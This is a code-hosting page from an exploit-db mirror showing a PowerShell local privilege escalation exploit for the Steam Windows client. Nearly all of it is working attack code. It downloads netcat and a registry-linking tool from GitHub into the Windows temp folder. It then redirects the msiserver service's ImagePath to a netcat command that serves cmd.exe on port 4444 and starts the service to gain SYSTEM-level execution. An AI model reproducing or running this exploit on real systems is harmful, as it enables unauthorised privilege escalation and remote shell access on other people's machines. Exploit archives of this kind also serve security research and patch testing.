bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/47238.ps1
Offensive Security 998fb1eeec DB: 2019-08-14 
6 changes to exploits/shellcodes

Steam Windows Client - Local Privilege Escalation
Agent Tesla Botnet - Arbitrary Code Execution
AZORult Botnet - SQL Injection

Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)
Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode
Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode
2019-08-14 05:02:24 +00:00

30 lines
No EOL
1.3 KiB
PowerShell
Raw Blame History

$SteamRegKey = "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
$MSIRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver"
$RegDir = "C:\Windows\Temp\RegLN.exe"
$PayDir = "C:\Windows\Temp\payload.exe"
$Payload = "c:\windows\system32\cmd.exe /c c:\windows\temp\payload.exe 127.0.0.1 4444 -e cmd.exe"
$PayDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/nc.exe"
$RegDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/RegLN.exe"
$WebClient = New-Object System.Net.WebClient
If(!((Test-Path -Path $RegDir) -And (Test-Path -Path $PayDir)))
{
$WebClient.DownloadFile($PayDownload, $PayDir)
$WebClient.DownloadFile($RegDownload, $RegDir)
}
If(Get-ItemProperty -Path $SteamRegKey -Name ImagePath -ErrorAction SilentlyContinue)
{
Start-Service -DisplayName "Steam Client Service"
Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
Start-Service -Name "msiserver"
}
Else
{
Remove-Item -Path $SteamRegKey -Recurse
Start-Process -FilePath $RegDir -ArgumentList "HKLM\Software\Wow6432Node\Valve\Steam\NSIS HKLM\SYSTEM\CurrentControlSet\Services\msiserver"
Start-Service -DisplayName "Steam Client Service"
Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
Start-Service -Name "msiserver"
}
Reference in a new issue View git blame Copy permalink